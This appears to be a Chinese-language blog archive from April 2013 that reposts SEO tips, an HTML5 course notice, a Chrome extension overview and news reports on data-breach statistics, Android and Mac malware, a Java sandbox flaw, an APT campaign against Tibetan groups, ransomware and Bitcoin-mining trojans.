趙義隆 /  台灣大學國際企業研究所教授及前所長
廖志德 /  誠邦網絡公司總經理
劉樹崇 /  美商美樂家台灣公司總經理,直銷協會第八屆理事長、中華民國企業經理協會『國家傑出經理獎』得獎人
樓永堅 /  政治大學企業管理學系研究所教授、政大公企中心主任
蔡媛慧 /  達彼思廣告上海辦公室董事總經理
鄧永宗 /  誠訊國際公司總經理
穆忠強 /  桑河數位科技股份有限公司顧問
鍾筱敏 /  先勢互動行銷公司總經理
蕭美麗 /  資策會產業支援處副處長
蕭富峰 /  輔仁大學大眾傳播學研究所副教授、廣告傳播學主任
韓志傑 /  香港商雅虎資訊台灣分公司亞太區行銷部副總裁
韓德行 /  冠品化學公司行銷業務處總經理、前華碩公司全球品牌行銷總監
簡佩萍 /  電子時報研究經理
籃雅寧 /  奧美集團品牌發展總監
姚紹華 /  奇利互動廣告總經理

聯絡資訊:
聯絡人:游珮琪  電話:02-2547-5060 Mail: marketing@team.com.tw

什麼是最佳的網站結構(Website architecture)?


什麼是最佳的網站結構(Website architecture)?

我們曾經在"什麼是網站結構? 如何影響SEO?"說,要注意三個重要的元素:Site Navigation(網站導航)、Internal Linking(內部連結)、URL Structure(網址結構),並且就可使用性(Usability)、規模可伸縮性(Scalability)、以及可解讀性(Interpretability)來思考網站結構,就可以說是萬無一失了。但是這樣的說法還是太難以理解,我們用更清楚的方式來說明 ...

"內容為王、架構為后"一直是我們的SEO核心理念,用專業術語來說就是,針對使用者的結構,是指可以讓使用者很方便瀏覽或是可使用性(Usability)的網站結構。針對網站的結構,是指可以讓網站具有規模可伸縮性(Scalability)的網站結構。針對搜尋引擎的結構,是指可以讓搜尋引擎可解讀性(Interpretability)的網站結構。

為了更簡單的讓大家了解,這篇"Website architecture: best practices for SEO"以條列式的方式,應該更容易了解:

(1) Avoid dynamic URLs.避免使用動態網址結構 (可使用性+搜尋引擎可解讀性)。

動態網址結構不是不能用,而是如果可以避免的話,就使用靜態的網址。例如你可以把

改變成為

Google在"Dynamic URLs vs. static URLs"說到,因為dynamic URL最可能發生的問題就是,不同的參數的不同URL可能連到相同的網頁內容。對於搜尋引擎來說這些URL就是不同的網頁,因此可能變成「內容重複」的情況。

但是如果把動態網址結構要變成靜態網址結構,會有困難度的話,也不必太勉強,就讓搜尋引擎來處理。因為使用URL Rewrite規則或是Canonical標記,如果發生錯誤的話,反而讓搜尋引擎無法正常索引。

(2) Avoid session IDs. 避免使用session參數 (可使用性+搜尋引擎可解讀性)。

session id會引起安全上的問題之外,session id對於SEO也是不好的,如"4 Reasons, Why Session Id’s are Bad for SEO ?"說的,最不好的地方跟上述dynamic URL問題類似,你的相同網頁可能被索引成眾多不同URL如下:

因此應該絕對避免你的網址上有session id出現。

(3) Content/links in Java/Javascript/Flash. 避免使用Java/Javascript/Flash來顯示內容或是連結 (搜尋引擎可解讀性)。

我們在"SEO趨勢 : Javascript 會影響搜尋引擎抓取?"及"Google可以索引AJAX與Javascript內容?"說過,不管搜尋引擎是否可以索引Java/Javascript/Flash中的文字,網站都應該避免使用。因為我們無法得知,搜尋引擎到底願不願意去解析Java/Javascript/Flash中的文字,雖然搜尋引擎有能力解析,但是不代表他願意解析所有網站。

(4) 302 redirections. 避免使用302的轉址 (搜尋引擎可解讀性)。

301轉址是永久轉址,302轉址是暫時轉址,如SEOmoz在redirect說的,302轉址通常不會傳遞SEO Value,也就是沒有link juice,因為它是暫時轉址。雖然"SEO advice: discussing 302 redirects"說到,不管永久轉址或是暫時轉址,Google還可能會選擇較短的網址進行索引。

所以除非特別必要,應該盡可能使用301轉址

(5) Website hierarchy should match the way users search. 網站階層應該符合讀者的搜尋習慣 (可使用性)。

這裡指的是應該有合理的網站地圖結構,也就是你的網站應該要讓使用者可以猜測,例如你有/category/men,應該會有/category/women、/category/girl、或是/category/boy。如此會讓使用者知道到哪裡去尋找需要的網頁。

(6) Cross-link relevant content. 要串聯相關的內容 (可使用性+搜尋引擎可解讀性)。

在"15個應該注意的SEO事項"就提到,internal links也是backlinks的一種,並且正確的使用可以讓搜尋引擎瞭解你的頁面關係。在"什麼是網站結構? 如何影響SEO?"也說,內部連結的存在可以讓網站頁面間有關聯存在、頁面間的關聯就可以使用錨點文字強調、可以讓讀者知道有哪些相關的資訊、可以增加點選機率而停留在網站內、也可以降低跳離率的問題等等。

(7) Use proper anchor text. 使用恰當的錨點文字 (可使用性+搜尋引擎可解讀性)。

在"為什麼Google不顯示正確的網頁標題?"說到,有太多的重覆字詞出現在標題(title)以及描述內容(description)中,外部資料(如錨點文字)有強烈訊號顯示某些字詞,都會讓搜尋引擎不認同你的設定,而在SERP中更動你的網頁標題或是描述。對於使用者而言,不當的標題/描述/錨點文字,也會讓你的網頁有過高的跳離率。

(8) Use breadcrumb navigation. 使用麵包屑瀏覽 (可使用性+搜尋引擎可解讀性)。

breadcrumb(麵包屑導覽)可以讓Bing或是Google更清楚知道你的網站結構,也可以讓使用者知道他現在的位置,而依序的找到他需要的資訊,如下圖:


(9) Minimize link depth. 連結深度最小化 (搜尋引擎可解讀性)。

因為搜尋引擎在抓取網站資料時,可能會限定連結深度,例如對於信賴度不高的網站,可能只抓到depth=2的網頁。如果你的網站有更深的連結的話,就可能會被放棄掉。所以應該盡可能的把連結深度做最小化的規劃。

轉載自《台灣搜尋引擎優化與行銷研究院》

2013年4月24日 星期三

報告:資料外洩事件75%為經濟利益


報告:資料外洩事件75%為經濟利益

Verizon報告統計,資料外洩事件的攻擊動機以經濟效益為首,總共佔75%,間諜活動以20%居次,其他則為網路激進團體所為5%。在攻擊手法方面,有52%使用駭客技術、惡意軟體40%、實體攻擊29%(ATM提款機測錄密碼等)、社交技術29%(網路釣魚等)。 

美國電信公司Verizon今日(4/23)發表2013年資料外洩調查報告,顯示網路間諜活動導致的資料外洩事件在去年成長至19%。該份報告由Verizon的風險管理團隊統計美國國家電腦緊急應變處理中心(National Computer Emergency Response Teams,CERTs)等18個資安與司法單位,在2012年調查的4.7萬多筆資安事件資料與621起確定資料外洩事件,總共約4400筆資料外洩。

該份報告統計,攻擊動機方面以經濟效益為首,總共佔75%,間諜活動以20%居次,其他則為網路激進團體所為5%。在攻擊手法方面,有52%使用駭客技術、惡意軟體40%、實體攻擊29%(ATM提款機測錄密碼等)、社交技術29%(網路釣魚等)。

若以發起攻擊的地區來看,中國以30%居首、羅馬尼亞28%居次、美國本土以18%排名第三,其他依序為保加利亞7%、俄國5%、荷蘭1%、亞美尼亞1%、德國1%、哥倫比亞1%與巴西1%。另外該份報告特別指出,僅有14%的攻擊事件來自組織內部。

報告中指出,120件與美國政府有關的資料外洩事件中,96%的攻擊來源是中國,其他4%則無法辨識。不過Verizon向媒體表示,這不代表中國主導這些攻擊,一方面可能是剛好只有蒐集到源自中國的攻擊資料,也可能只是中國當地對網際網路法規不夠嚴謹,吸引網路罪犯從中國發起攻擊。

報告中指出,網路激進團體的攻擊事件在去年大幅下降。2011年有58%資料外洩事件是由網路激進團體所為,2012年降至5%。Verizon認為一方面是激進團體改變攻擊的目標與方式,另一方面與LulzSec領袖遭逮捕並協助司法單位追查相關嫌犯有關。但報告也指出,DDoS攻擊相對於其他攻擊技術廉價且簡單,卻可以提供強大且複雜的效果,因此日後可能會大量成長。

攻擊目標方面的行業分面,一般受害案例是金融單位37%、零售業24%、餐飲食品業20%。但在間諜案件方面,主要受害者為握有大量智慧財產權的製造業、專業服務業、資訊業、工程顧問等等。而且大型組織與小型組織各佔一半的現象也出乎意料,不過分析指出,這些被攻擊的小型組織大部分都是大型組織的下屬單位,因此比其他行組織握有更多智慧財產權。

有8成的資料外洩事件中駭客取得使用者的有效憑證,因此報告呼籲大家應該停止依賴單一密碼技術,改用雙因素認證,可以降低攻擊事件、逼迫駭客改變攻擊目標或手法

Verizon也指出雲端技術與安全性沒有多大的關連,以資料隱碼攻擊(SQL injection)為例,只要系統存有該漏洞,該系統放置在雲端或內部都沒有差別。

轉載自《iThome》

Akamai:全球電腦攻擊流量中、美、土包辦前三名 台灣名列第五


Akamai:全球電腦攻擊流量中、美、土包辦前三名 台灣名列第五

最新安全研究報告直指,中國是全球惡意電腦攻擊的主要來源,美國則僅次在後。

全球電腦攻擊統計

在一份由內容遞送服務(CDN)供應商Akamai Technologies於今日公佈的安全報告中指出,有高達41%的全球電腦攻擊流量來自於中國。就Bloomberg的報導指出,最新統計分析顯示,來自中國的網路攻擊量,比起去年高出3倍多;再者,中國上一季的佔比約為33%。

中國長久以來一直為了被指控是網路攻擊的持續來源而爭辯不已,並且斷然否認這些攻擊不是國家贊助就是基於軍事目的指控。今年2月間,安全公司Mandiant指出,有一股勢不可擋的巨量攻擊波來自中國,其中大部分流量源自於上海某軍事單位。中國官員對該報告嚴加駁斥,並稱其證據毫無根據。

不論如何,美國似乎也難逃被譴責的命運。根據該研究報告指出,美國成為全球第二大的網路攻擊來源,並且必須為10%的全球攻擊流量負責。至於上一季,約有13%的全球網路攻擊來自於美國。

美中局勢早已十分緊張,美國總統歐巴馬(Obama)最近表示,如今網路犯罪已然成為與亞洲國家會談上的「關鍵」議題。

雖然土耳其鮮少會與網路攻擊扯上關連,但在Akamai的報告中卻位居第三,同時有4.3%的全球攻擊封包來自該國。俄羅斯則以4.3%的比例位居第四位,第五名的台灣,則占全球攻擊流量的3.7%。

原文出處:ZDNet
轉載自《網路資訊》

賽門鐵克:行動裝置、Mac電腦惡意程式數量增加


賽門鐵克:行動裝置、Mac電腦惡意程式數量增加

報告發現去年行動惡意程式數量種類與變種程式數量均向上成長,發現的Android變種惡意程式數量近4400個,另外,去年也發現10種Mac電腦惡意程式。

賽門鐵克發佈2013網路安全威脅報告,發現行動裝置威脅數量增加,去年鎖定Android的行動惡意程式數已接近4400個,Mac電腦受到的安全威脅也呈現同樣趨勢,去年就發現10種惡意程式。

該份報告是以賽門鐵克在全球200個國家部署的20萬個感應器蒐集資料得來,該報告指出四項安全威脅,有愈來愈多的小型企業遭到目標式攻擊,駭客攻擊手法走向精緻化,如透過網站攻擊目標對象的水坑攻擊(Watering Hole)。

與2011年相比,2012年鎖定行動裝置的惡意程式增加了58%,以Android惡意程式為例,不論惡意程式的種類或變種程式數量都呈現攀升的趨勢,去年底Android惡意程式種類已超過160種,惡意程式種類與變種程式數量間的比例則從1比5增加到1比38,已發現將近4400個變種惡意程式。

賽門鐵克首席技術顧問張士龍表示,鎖定行動裝置的惡意程式數量快速成長,惡意程式種類與變種數量均向上增加,依此趨勢發展,未來有一天行動惡意程式數量甚至可能超越PC惡意程式。

除了惡意程式數量增加,行動作業系統的漏洞數量也有增加的現象。漏洞數從2011年發現的315個增加到2012年的415個,其中蘋果iOS漏洞就佔了387個,Android只有13個,但鎖定系統漏洞進行攻擊的惡意程式數量,iOS僅有1個,Android卻有103個,顯示在行動平台上漏洞數量與惡意程式數量不成正比,但不排除未來改變的可能性。

不僅行動惡意程式增加,Mac電腦也面臨愈來愈多的惡意程式威脅,發現的Mac惡意程式種類從2010年的3種增加為2011年的6種,2012年發現10種。賽門鐵克指出,惡意程式中雖然只有2.5%鎖定Mac電腦攻擊,從惡意程式比例來看,看似使用Mac電腦相當安全,但也因為這樣Mac用戶沒有安裝防護軟體,少數Mac惡意程式就能釀成大量感染,以去年最知名的Mac惡意程式Flashback為例,超過60萬台Mac電腦受感染,顯示Mac電腦的資訊安全風險增加。

轉載自《iThome》

Android手機有惡意軟體?5大徵兆提醒你


Android手機有惡意軟體?5大徵兆提醒你


Android手機惡意軟體(malware)似乎越來越猖獗,防毒業者Bitdefender調查,Android手機惡意軟體在2012年下半年的數量飆升292%,可能導致數百萬用戶受到威脅。此外,Android手機惡意軟體也越來越難偵測,還好大部分的惡意軟體創造者並不是火箭科學家(不會徹底毀壞你的手機),只不過,用戶也不是可以與之抗衡的電腦科學家;以下5個徵兆,可以協助用戶檢測自己的手機是否受感染:

1. 電池壽命變短

惡意軟體會讓手機電池神秘地比平常更加耗電,通常的原因是來自惡意廣告和垃圾軟體,不斷顯現的廣告會讓電池過度耗電。不管是隱藏在執行程式後頭、或是偽裝成普通App的惡意軟體,異常的電池表現通常就是告訴你:手機被惡意軟體入侵了。

2. 通話中斷

惡意軟體有可能影響通話,會造成莫名其妙的通話中斷;如果不是訊號問題那麼可能要檢查看看罪魁禍首是否為惡意軟體。可以先打電話給你的電信商,確定是否為線路問題,如果不是的話,可能某人正在竊聽你的通話,或進行其它可儀活動。

3. 異常電信費用

惡意軟體有時候讓受感染手機自動發送簡訊,雖然只要確認手機帳單就可以知道,不過並非所有的惡意軟體皆會發送大量的簡訊,可能會選擇發送小量簡訊,以免讓用戶起疑。無論如何,如果覺得帳單「怪怪的」,請記得確認手機是否已被安裝惡意軟體。

4. 自動下載軟體

惡意軟體會在用戶不知情的狀況下,偷偷下載軟體,檢查上網費用帳單就可以知道是不是有異常;如果想知道自己是否有這樣的情況,可以設定下載限額,也可以避免因為惡意軟體過度下載軟體而導致的高額通訊連網費用。

5. 手機效能變差

由於惡意軟體會企圖透過手機讀、寫、或散播資訊,因此極可能導致嚴重的效能問題;如果你的家用電腦曾經中毒過,那麼一定很熟悉。試圖想像:每天數次重新啟動惡意軟體,當然會占去過多的手機效能,因此當你發現手機效能變差,也可能是惡意軟體已經存在的線索之一。可藉由檢查RAM使用量或CPU負載量,得知惡意軟體是否存在。

目前惡意軟體針對的Android手機作業系統大多為Gingerbread 2.3、Ice Cream Sandwich 4.0、和Jelly Bean 4.1,如果發現手機已經存在惡意軟體,首先要刪掉有問題的應用程式,不過這樣做有可能還是無法完全根除,接著透過設定選項,選擇恢復原廠設定,但是請注意:此動作會將手機內所有資料清除。

原文出處:ReadWrite
轉載自《數位時代》

2013年4月23日 星期二

甲骨文漏洞獵人找到全新的Java 7伺服器漏洞


甲骨文漏洞獵人找到全新的Java 7伺服器漏洞

Java 漏洞
上週甲骨文(Oracle)釋出了修補多達42個全新安全漏洞的Java 7 Update 21安全更新程式。本週一,波蘭安全專家再度警告,其在全新出貨的伺服器Java Runtime Environment(JRE)中,發現Reflection API存在的安全漏洞。

「該全新弱點被確認會感染所有版本的Java SE 7(包括最近發表的1.7.0_21-b11在內),」資深Java漏洞獵人暨波蘭安全方案商Security Explorations創辦人與執行長Adam Gowdiak在「Full Disclosure mailing list」論壇上指出:「透過該漏洞,能在目標系統上完全避開Java安全沙盒的偵測。想要成功對Web瀏覽器發動漏洞攻擊,需要適當的使用者互動(在安全警示窗出現時,使用者必須承擔潛在惡意Java應用程式的執行風險)。」

根據Gowdiak在Security Explorations的漏洞部落格中表示,他已於週一向甲骨文提交漏洞報告,其中包括概念式驗證漏洞攻擊程式碼。

儘管在用戶端的攻擊上,必須在使用者不小心點選或允許的前提下,才可能讓惡意應用程式觸發漏洞攻擊。但原則上該安全漏洞能被用來避開Java沙盒,並可在用戶端或伺服器上執行任意程式碼。

Java Reflection API安全漏洞持續成為甲骨文的一大挑戰。該安全漏洞會欺騙挑戰與回應(Challenge-response)安全系統,以洩漏回應自身挑戰的答案。但該漏洞另有不同之處,「令人覺得有意思的是,該全新安全疑慮不但會出現在JRE外掛/JDK軟體中,同時也會出現在最新才剛發表的Server JRE上,」Gowdiak表示。

原文出處:InformationWeek
轉載自《網路資訊》

2013年4月22日 星期一

Symantec:目標式攻擊轉向中小企業


Symantec:目標式攻擊轉向中小企業

2012年有31%的目標式攻擊鎖定少於250名員工的中小型企業,相關的攻擊數是2011年的3倍。主因是駭客發現中小企業仍有值得偷竊的有價資料,而且這些企業通常防禦較弱;最常受到目標式攻擊的領域為製造業,佔所有目標式攻擊的24%。 

資安業者賽門鐵克(Symantec)周二(4/16)公布第18期產業安全威脅報告(Internet Security Threat Report 2013),指出去年資安市場上出現愈來愈多的目標式攻擊,也有愈來愈多的攻擊鎖定中小企業。

該報告分析了全球157個國家所出現的攻擊行動,發現2012年的目標式攻擊數量成長了42%,平均每天會出現116起目標式攻擊行動,這類的攻擊讓資料竊盜更形嚴重,同時也帶來更多的產業間諜事故。

此外,賽門鐵克還發現駭客調整了攻擊對象,有31%的目標式攻擊鎖定少於250名員工的中小型企業,相關的攻擊數是2011年的3倍。主因是駭客發現中小企業仍有值得偷竊的有價資料,而且這些企業通常防禦較弱;最常受到目標式攻擊的領域為製造業,佔所有目標式攻擊的24%。

目標式攻擊所使用的手法中最引人注目的是水坑攻擊(watering hole attacks),駭客並不直接駭進目標企業,而是於受歡迎的公開網站上嵌入惡意程式,等到目標企業的用戶造訪該站時再趁機進行感染,包括Facebook、蘋果及微軟都曾成為水坑攻擊的受害者。

其中,最知名的攻擊事件是由Elderwood駭客集團所操作的水坑攻擊,曾於1天內感染500家企業。

另一方面,去年的零時差漏洞多了14個,整體的漏洞數量為5291個,行動漏洞也有416個。賽門鐵克分析,駭客使用這些漏洞來攻擊目標企業,若這些企業並未經常部署修補程式或更新,便特別容易被駭,因此,雖然新漏洞的增加速度變慢了,但攻擊次數卻成長了30%。

值得注意的是,市場上出現的眾多攻擊套件讓缺乏技術背景的使用者也能成為駭客,這些攻擊套件利用瀏覽器與外掛程式的漏洞進行攻擊,2012年所有的網路攻擊中,就有41%透過Blackhole攻擊套件執行。

在行動安全上,該報告的分析顯示,行動漏洞數量與行動攻擊數量並不成正比。例如現在市場上最受歡迎的兩大行動平台為Android及iOS,Android只有13個安全漏洞,iOS卻有387個,可是去年163個行動威脅中,就有158個是鎖定Android平台。賽門鐵克分析,這是因為Android市佔率較高、且為開放平台,又有多種程式通路所致。行動裝置的普及亦使得去年行動惡意程式的數量比2011年增加了58%。

轉載自《iThome》

中國網軍用APT打擊西藏活動 台灣政府單位也中槍


中國網軍用APT打擊西藏活動 台灣政府單位也中槍


APT攻擊近來相當頻繁,日前(4/18)FireEye在部落格上揭露一起由中國駭客組織Shiqiang發動的APT攻擊,竊取目標人士的身份認證資訊與機密資料,主要目的是打擊西藏活動與相關人士,而一些提供庇護或資源的單位,包括數個台灣政府部門,與位於印度的西藏研究中央大學(Central University Of Tibetan Studies),也因為此成為駭客的攻擊目標。

此次APT攻擊主要透過一封夾帶XLS檔案的email進行散布(如下圖),惡意郵件主旨為「西藏流亡政府駐美洲辦事處 2013下半年征求意見詳單」,一旦使用者打開附件excel檔案後,檔案內容只會出現「你的系統不支持藏文,請訪問微軟官方網站下載藏文字幕」。


(圖片來源:FireEye)

事實上,這不過是個幌子,這份惡意文件利用了微軟Office最新的安全漏洞CVE-2012-0158,使用者在開啟附件後,電腦就會自動抓取一系列檔案(如下圖),最終目的是為了下載與執行一個名為「2013soft」的DLL檔,這個DLL檔是為了在Windows程序管理器explorer.exe注入遠端存取木馬程式(RAT,Remote Administration Tool)而設計。


(圖片來源:FireEye)

而被下載至使用者電腦的RAT,是中國知名遠端控制軟體GrayPigeon(灰鴿子)的變種,其以Delphi撰寫且包含許多功能,像是確定主機名稱和作業系統版本、紀錄按鍵和滑鼠事件、擷取電腦螢幕畫面、使用Telnet協定、發送與接收文件、以及主動關機和重新啟動等。此外,該病毒還使用不同的Pascal模組,比如TscreenCaptureUnit.pas和UnitServices.pas,並藉由TEA (Tiny Encryption algorithm)加密演算法,加密C&C伺服器的位址help.2012hi.hk,以免被偵測出來。

雖然此次目標攻擊可能僅針對特定人士,卻也再度突顯中國對台灣網路威脅的嚴重性。趨勢科技台灣區暨香港區總經理洪偉淦日前在接受媒體的訪問時就指出,台灣是遭受駭客攻擊的密度,不是全球第一,就是第二,其原因就來自於廣大的中國駭客。

國安局局長蔡德勝也於今(2013)年三月底時表示,中國駭客對於台灣的網路攻擊,從過去以竊取機密資料為主,到現在已經開始逐漸鎖定破壞台灣的基礎設施,比如交通、金融系統。他也強調,這些來自中國的網路攻擊相當嚴重,將對台灣政府和企業造成重大的衝擊,並可能帶來比恐怖主義攻擊更危險的全球威脅。

其實,自2013年初以來,世界各國陸續傳出APT攻擊事件,面對日益精密的攻擊手法,如何做好防禦已成為企業最重要的議題,即將於4/24-26展開的2013亞太資訊安全論壇,有許多關於APT攻擊與防禦之道的精彩演講,歡迎大家踴躍參加,掌握最多最新的APT攻擊情報。

轉載自《資安人科技網》

Search Engine Optimization : 搜尋引擎優化六大心法


Search Engine Optimization : 搜尋引擎優化六大心法


搜尋引擎優化/搜尋引擎最佳化(Search Engine Optimization)六大心法是啥?

(1)由內而外 - 指的是由網站內部的健全, 然後才能由外眾星拱月
(2)建立關聯 - 搜尋引擎最重要任務就是把全球網頁組織起來, 所以內外關聯的建立是重要任務
(3)自然成長 - 跟搜尋引擎作朋友重在自然, 任何不自然的關連不能打動搜尋引擎
(4)經常更新 - 搜尋引擎喜歡活著的網站, 經常更新就是活著的証明
(5)知己知彼 - 搜尋引擎優化之戰不是亂槍打鳥, 必須鎖定關鍵字, 鎖定競爭對手
(6)善用工具 - 必須使用科學化的工具來解決煩人的問題

只要把以上的搜尋引擎優化/搜尋引擎最佳化(Search Engine Optimization)六大心法牢記在心, 相信您也能夠體驗出別於旁人的獨門武功

節錄自《台灣搜尋引擎優化與行銷研究院》

2013年4月18日 星期四

2013 HTML5 兩日實戰課程


2013 HTML5 兩日實戰課程
國際認證教師專業證照教育訓練(教師研習營) 

一、緣起 近年來,由於IT及企業環境的快速變化,不論是歐美、日本、中國或台灣企業,都相當重視技專院校教育實務化及專業證照化,也因此各國競相推出相關的認證考試,來引導及鼓勵取得專業證照,並檢驗其專業能力。其中,MCP (Microsoft ® Certification Professional)國際認證在這幾年來不論在國內或國外,都相當的受到重視,此認證是MCP (Microsoft ® Certification Professional)對各行各業的需求而起,由Microsoft® 原廠擔任命題。MCP認證分為五大類分別為,資訊管理(IT Management)、軟體開發(Development )、資訊技術(IT Support)、資料中心(Data Center )、網路資安(Networks Security),針對軟體開發(Development )中的MCSD: Web Applications Solutions Developer,目前有3科簡中/英文考試。藉由此證照之取得,作為教師日後將考試認證與教學課程結合之參考。

二、課程目標 MCSD: Web Applications Solutions Developer認證分為3個考科(HTML5、.NET設計、Azure程式開發)目前有1科中文考試。透過研習,讓參與的老師了解MCSD認證的學習指標與內容,做為日後將考試認證與教學課程結合的參考,以追求更好的學習成果及國際認證成績。

三、課程內容:本次研習進行MCSD軟體開發管理課程規劃,並輔導老師取得相關專業證照。

四、學習效益:
1. 透過研習活動,讓教師認識MCSD認證,同時針對活動主題涵蓋的範圍,進行概括性的介紹與重點式的複習,並藉此輔導老師通過證照測驗,提升老師的個人技能及提升教學方式。
2. 有助於通過「微軟網頁開發解決專家MCSD:(Microsoft® Certification Solutions Developer)」及其他各項MCSD相關之認證考試。

五、課程規劃
1.MCP認證介紹
(1)考試辦法介紹
(2)考試內容說明MCP

2.HTML 業界實務
(1)設計HTML5網頁
(2)了解JavaScript與jQuery程式語法、事件
(3)設計表單蒐集資料,與資料輸入驗證
(4)使用XMLHTTPRequest與AJAX、jQuery與遠端資料來源溝通,以存取遠端資料
(5)利用CSS3樣式設計網頁導覽功能,與套用樣式
(6)使用JavaScript以物件導向的原則來建立物件、擴充物件與設計方法 MVP
(7)使用HTML5 API存取檔案、播放影片、以Geolocation蒐集地理定位資訊
(8)離線應用程式設計
(9) 實作Adaptive User Interface
(10)使用HTML5 API存取檔案、播放影片、以Geolocation蒐集地理定位資訊
(11)離線應用程式設計
(12)實作Adaptive User Interface
(13)利用Canvas與SVG(Scalable Vector Graphics)建立進階的繪圖程式
(14)套用CSS Transition設計動畫、變形
(15)使用Web Sockets設計即時通訊的網頁,利用Web Sockets來接收與傳送資料
(16)利用Web Worker設計支援多執行緒、以非同步方式執行的網頁程式 MVP專業講師

3.Prometric 70-480 上機考試

六、客服連絡人員:
 全域科技有限公司 吳筱莉:0937-997179

七、師資:微軟最有價值專家(Microsoft Most Valuable Professional,以下簡稱MVP)擔任講師。

八、使用教材:上課講師自編之教材。

九、上課日期:
102年5月11日~5月12日(二日)

十、上課地點:
致理技術學院 圖書大樓 6F 602教室 地址:22050 新北市板橋區文化路1段313號 / TEL :
(02)2257-6167-8(代表號)

十一、費用:上課費用: 2000元 上課含考試:3500元 (考試卷,原價:3355元)

十二、報名方式:線上報名(非教師亦可報名)

勒索軟體再進化 比對網頁記錄提高詐騙可信度


勒索軟體再進化 比對網頁記錄提高詐騙可信度

勒索軟體(Rasonmware)進化速度越來越快,今(2013)年初才出現不付錢就刪除硬碟資料的病毒Trojan.Ransomlock.G(或稱Reveton),最近資安公司Kafeine又發現另外一款Kovter病毒,它會去比對受害者的網頁瀏覽記錄,從而提高可信度。

Kovter會假冒成執法單位寄mail給受害者,如:美國司法部(U.S. Department of Justice)、美國國土安全部(U.S. Department of Homeland Security)或聯邦調查局(FBI),宣稱受害者的電腦下載和傳播非法內容的影片,該聲明中還會列出電腦的IP位址、主機名稱,以及一個特定網站

同時Kovter會擷取受害者的網頁瀏覽紀錄,並與遠端主機中的一份色情網站名單進行比對,如果發現有符合的網站,就會把網址放入寄給使用者的訊息中,如果沒有相符的網址,Kovter就會隨機選取網址。事實上,這些色情網站不見得是非法的,但Kovter利用人性的弱點,明確指出他們瀏覽過哪些網站,並謊稱網站內容是非法的,以提高其可信度。

勒索軟體存在已久,卻在2012年首度大幅成長,也因此引來資安公司的關注,甚至將其列為2013年重要的資安威脅。它讓駭客可以控制與鎖定受害者的電腦,以此要求受害者支付「贖金」,才能解開遭鎖定的電腦,其威脅方式有很多種,除了上述所提之外,還有一些Rasonmware病毒會使用電腦的攝影機,一旦有人出現就會拍下照片,然後將照片附在寄給用戶的訊息中,增加用戶心理壓力以促使其儘速付款。

卡巴斯基實驗室(Kaspersky Lab)的病毒專家Sergey Golovanov指出,自2013年以來,每天平均遭受Rasonmware感染的電腦數目已經增加了一倍,他強調,一旦用戶電腦被Rasonmware綁架,絕對不要支付罰款,應該透過其他電腦上網搜尋防毒廠商提供的工具來解除威脅。

轉載自《資安人科技網》

虛擬貨幣Bitcoin快速升值 成駭客眼中新肥羊


虛擬貨幣Bitcoin快速升值 成駭客眼中新肥羊

在網路交易世界中,虛擬貨幣所代表的意義與現金一樣,對駭客來說也具有相同吸引力,日前,卡巴斯基實驗室(Kaspersky Lab)便發現一款以賺取Bitcoin(BTC)為目的的病毒。

Bitcoin於2009年問市,又稱為比特幣或位元幣,為目前最廣泛使用的虛擬貨幣,其透過Bitcoin挖礦(Bitcoin mining)程序、也就是一種特殊演算法而產生,只要設定好規則以及運算方式,讓電腦自動計算就可以產生Bitcoin,而網路犯罪者掌握了Bitcoin演算邏輯,發展出可以運算Bitcoin的病毒,再透過Skype散布以控制用戶的電腦進行運算,藉此賺取Bitcoin。

Kaspersky Lab研究人員Dmitry Bestuzhev表示,這款新的木馬在圖片中夾帶惡意網址bit.ly,並傳送相關訊息如:這是你的照片中我最喜歡的一張,以此誘騙Skype用戶造訪惡意網站,並藉機下載執行檔skype-img-04_04-2013.exe至用戶電腦中,以安裝一個不易被防毒軟體偵測的木馬程式。目前為止,此惡意網址的平均點擊率相當高,平均每小時高達2000次以上,主要的受害者來自義大利、俄國、波蘭、哥斯大黎加、西班牙、德國、烏克蘭等地區。

由於該木馬程式為了運算Bitcoin,故會大量耗用電腦資源,只要被感染成為殭屍電腦,CPU使用率將會異常的高,Bestuzhev表示,使用者一旦發現CPU利用率高於正常值,就表示其電腦可能已經遭受感染。

其實,與Bitcoin相關的資安事件不只這一椿,早在2012年9月,Bitcoin交易平台Bitfloor的伺服器就遭駭客入侵,被盜取了24000個Bitcoin,相當於25萬美元。在2013年4月3日,提供Bitcoin線上儲存服務的公司Instawallet也表示,駭客入侵資料庫並竊取Bitcoin,隔天,最大Bitcoin交易網站Mt.Gox也遭受DDoS攻擊,導致網站服務中斷。

MT.GOX認為,攻擊者可能是希望藉此方式導致Bitcoin貶值,讓使用者因恐慌而大量拋售Bitcoin,攻擊者就能收購以獲取利益。因應電子商務的發展所產生的電子貨幣,雖然提供了更方便的交易機制,然而其隱藏的安全威脅,恐怕也是相關業者未來不可忽略的挑戰。

轉載自《資安人科技網》

2013年4月17日 星期三

Google Chrome 瀏覽器安全嗎?


Google Chrome 瀏覽器安全嗎?

  幾個星期前,在加拿大溫哥華所舉辦的CanSecWest安全大會上,Google舉辦的第三屆Pwnium大賽中,Chrome OS展現了固若金湯的安全性能,即使大會應參賽者要求,將比賽截止時間延長3小時,仍讓所有參賽的駭客們無功而返,而由HP主辦、Google贊助的駭客大賽Pwn2Own 2013,Google Chrome瀏覽器則遭駭客入侵成功,也證明了Google Chrome確實有安全性的問題。至於其它的瀏覽器像是Firefox 和 IE10一樣在幾小時內就被攻陷,Apple的Safari雖然本屆幸免於難,不過那是因為沒有參賽者報名破解它。

接下來我們就來研究一下Google Chrome 瀏覽器是哪裡不安全?



  Chrome瀏覽器為Google所開發,是現在最受歡迎的瀏覽器之一。它結合了Google search、youtube等眾多的Google自家service,使其在速度方面有不錯的表現,在個人化部分,Chrome Web Store有豐富的Extensions (擴充功能),提供給使用者依個人喜好或習慣,去改變瀏覽器的功能或操作!

Chrome extension由manifest.json、圖片、js和CSS等網頁檔案所組成,結構大致上會像這樣:

 

manifest.json它定義了extension的內容和屬性,包括extension的名稱、描述、版本、語言及需要的permission等,如下圖(圖片來源:http://developer.chrome.com/extensions/manifest.html)



  由以上資料可以看出,extension的name、version、manifest_version是必須要有的,其它屬性則可有可無。這邊特別挑出content_scripts、permissions、update_url三個屬性來做簡單說明:

content_scripts:定義在網頁上運行的javascript,可以透過DOM來獲取使用者瀏覽頁面的內容,甚至還可以改變內容。

update_url:用來定義檢查更新的URL設定檔。

permissions:要使用Chorme的API,皆必須定義相對應該有的permission,如:檢查Gmail是否有新信件的Google Mail Checker,就必須有以下2個permission

1.存取您存放於*google.com的資料
2.存取您的分頁和流覽活動。



